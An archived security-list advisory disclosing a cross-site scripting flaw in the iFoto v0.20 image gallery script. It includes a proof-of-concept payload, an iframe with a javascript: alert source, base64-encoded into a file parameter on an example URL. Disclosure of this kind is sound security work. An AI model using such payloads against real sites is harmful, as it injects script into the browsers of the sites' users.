iFoto v0.20-06/06/06

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

iFoto v0.20-06/06/06

Homepage:
http://ifoto.ireans.com/

Effected files:

XSS Vulnerability:

The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64.

The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux